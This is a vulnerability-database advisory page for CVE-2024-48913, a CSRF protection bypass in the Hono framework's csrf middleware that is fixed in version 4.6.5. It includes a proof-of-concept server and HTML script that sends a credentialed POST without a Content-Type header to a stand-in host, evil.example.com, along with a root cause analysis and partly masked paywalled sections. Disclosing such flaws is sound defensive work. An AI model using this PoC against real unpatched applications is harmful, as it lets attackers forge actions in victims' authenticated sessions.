5.9

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-48913

GHSA ID

GHSA-2234-fmw7-43wr

EPSS Score

0.01712%

CWE

CWE-352

Published

10/15/2024

Updated

11/7/2024

KEV Status

Technology

JavaScript

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2024-48913

CVE-2024-48913: Hono allows bypass of CSRF Middleware by a request without Content-Type header.

Summary

Bypass CSRF Middleware by a request without Content-Type herader.

Details

Although the csrf middleware verifies the Content-Type Header, Hono always considers a request without a Content-Type header to be safe.

https://github.com/honojs/hono/blob/cebf4e87f3984a6a034e60a43f542b4c5225b668/src/middleware/csrf/index.ts#L76-L89

PoC

// server.js
import { Hono } from 'hono'
import { csrf }from 'hono/csrf'
const app = new Hono()
app.use(csrf())
app.get('/', (c) => {
  return c.html('Hello Hono!')
})
app.post('/', async (c) => {
  console.log("executed")
  return c.text( await c.req.text())
})
Deno.serve(app.fetch)

<!-- PoC.html -->
<script>
async function myclick() {
    await fetch("http://evil.example.com", {
    method: "POST",
    credentials: "include",
    body:new Blob([`test`],{}),
    });
}
</script>
<input type="button" onclick="myclick()" value="run" />

Similarly, the fetch API does not add a Content-Type header for requests that do not include a Body.

await fetch("http://localhost:8000", { method: "POST", credentials: "include"});

Impact

Bypass csrf protection implemented with hono csrf middleware.

(GitHub Advisory)

5.9

CVSS Score

3.1

Basic Information

CVE ID

CVE-2024-48913

GHSA ID

GHSA-2234-fmw7-43wr

EPSS Score

0.01712%

CWE

CWE-352

Published

10/15/2024

Updated

11/7/2024

KEV Status

Technology

JavaScript

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:H/A:N

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
hono	npm	< 4.6.5	4.6.5

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability stems from how the CSRF middleware handles missing Content-Type headers. The original code used 'c.req.header('content-type') || ''' (line 76-89 in index.ts), which made requests without Content-Type headers pass the isRequestedByFormElementRe regex check. This allowed POST requests with empty/missing Content-Type to bypass CSRF validation. The patched version changes the default to 'text/plain' to properly enforce checks. The commit diff and vulnerability details directly point to this middleware handler as the vulnerable component.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

### Summ*ry *yp*ss *SR* Mi**l*w*r* *y * r*qu*st wit*out *ont*nt-Typ* **r***r. ### **t*ils *lt*ou** t** *sr* mi**l*w*r* v*ri*i*s t** *ont*nt-Typ* *****r, *ono *lw*ys *onsi**rs * r*qu*st wit*out * *ont*nt-Typ* *****r to ** s***. *ttps://*it*u*.*om/*o

Reasoning

T** vuln*r**ility st*ms *rom *ow t** *SR* mi**l*w*r* **n*l*s missin* *ont*nt-Typ* *****rs. T** ori*in*l *o** us** '*.r*q.*****r('*ont*nt-typ*') || ''' (lin* **-** in `in**x.ts`), w*i** m*** r*qu*sts wit*out *ont*nt-Typ* *****rs p*ss t** `isR*qu*st***

5.9

Basic Information

Concerned about an active attack path?

CVE-2024-48913: Hono allows bypass of CSRF Middleware by a request without Content-Type header.

Summary

Details

PoC

Impact

5.9

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI